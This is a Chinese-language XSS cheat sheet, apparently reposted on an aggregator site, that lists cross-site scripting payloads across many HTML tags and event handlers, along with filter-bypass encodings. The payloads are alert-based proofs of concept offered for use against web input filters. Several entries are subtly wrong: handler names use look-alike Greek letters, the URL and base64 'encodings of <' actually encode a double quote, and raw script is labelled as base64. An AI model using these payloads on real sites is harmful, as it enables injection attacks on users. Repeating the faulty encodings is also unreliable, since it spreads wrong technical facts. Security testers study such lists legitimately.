一、標準語句<script>alert(/XSS/)</script>二、嘗試大小寫<sCript>alert(1)</scRipt>三、使用<img>標簽1、windows事件 <img src="x" οnerrοr=alert(1)> <img src="1" οnerrοr=eval("alert('xss')")> //圖片加載錯誤時觸發2、鼠標事件 <img src=1 οnmοuseοver="alert(1)"> //鼠標指針移動到元素時觸發 <img src=1 οnmοuseοut="alert(1)"> //鼠標指針移出時觸發四、使用<a>標簽1、使用href屬性 <a href="https://www.qq.com">qq</a> <a href=javascript:alert('xss')>test</a> <a href="javascript:a" οnmοuseοver="alert(/xss/)">aa</a> <a href="" οnclick=alert('xss')>a</a> <a href="" οnclick=eval(alert('xss'))>aa</a> <a href=kycg.asp?ttt=1000 οnmοuseοver=prompt('xss') y=2016>aa</a>五、使用<input>標簽<input name="name" value=""> <input value="" οnclick=alert('xss') type="text"> <input name="name" value="" οnmοuseοver=prompt('xss') bad=""> <input name="name" value=""><script>alert('xss')</script> <input type="text" οnkeydοwn="alert(1)"> //用戶按下按鍵時觸發<input type="text" οnkeypress="alert(1)"> //用戶按下按鍵時觸發<input type="text" οnkeyup="alert(1)"> //用戶松開按鍵時觸發六、使用<from>標簽<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')><form method=post action=aa.asp? οnmοuseοver=prompt('xss')><form method=post action=aa.asp? οnmοuseοver=alert('xss')><form action=1 οnmοuseοver=alert('xss)><!--原code--><form method=post action="data:text/html;base64,<script>alert('xss')</script>"><!--base64編碼--><form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">七、 使用<iframe>標簽<iframe src=javascript:alert('xss')></iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe> <!--原code--><iframe src="data:text/html;base64,<script>alert('xss')</script>"> <!--base64編碼--><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> <iframe src="aaa" οnmοuseοver=alert('xss') /><iframe> <iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>八、 使用<svg>標簽<svg οnlοad=alert(1)>九、 使用<body>標簽<body οnlοad="alert(1)"> //加載時觸發十、 使用<button>標簽<button οnclick="alert(1)">text</button> //元素上點擊鼠標時觸發<p οnmοusedοwn="alert(1)">text</p> //元素上按下鼠標時觸發<p οnmοuseup="alert(1)">text</p> //在元素上釋放鼠標時觸發十一、 使用<p>標簽<p οnmοusedοwn="alert(1)">text</p> //元素上按下鼠標時觸發<p οnmοuseup="alert(1)">text</p> //在元素上釋放鼠標時觸發十二、XSS編碼繞過1、html實體編碼(10進制與16進制): 如把尖括號編碼[ < ] -----> html十進制: &#60; html十六進制:&#x3c;2、javascript的八進制跟十六進制: 如把尖括號編碼[ < ] -----> js八進制:\74 js十六進制:\x3c 三個八進制數字，如果數字不夠，在前面補零，如a的編碼為\141 兩個十六進制數字，如果數字不夠，在前面補零，如a的編碼為\x61 四個十六進制數字，如果數字不夠，在前面補零，如a的編碼為\u0061 對于一些控制字符，使用特殊的C類型的轉義風格，如\n和\r3、url編碼: 如把尖括號編碼[ < ] -----> url: %224、base64編碼: 如把尖括號編碼[ < ] -----> base64: Ig==5、jsunicode編碼： 如把尖括號編碼[ < ] ----->jsunicode:\u003c6、String.fromCharCode編碼 如alert的編碼為String.fromCharCode(97,108,101,114,116)

作者連接：https://mp.weixin.qq.com/s/iLa1Fzxfv1hVjcB7keWb5Q

總結

以上是生活随笔為你收集整理的XSS备忘录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。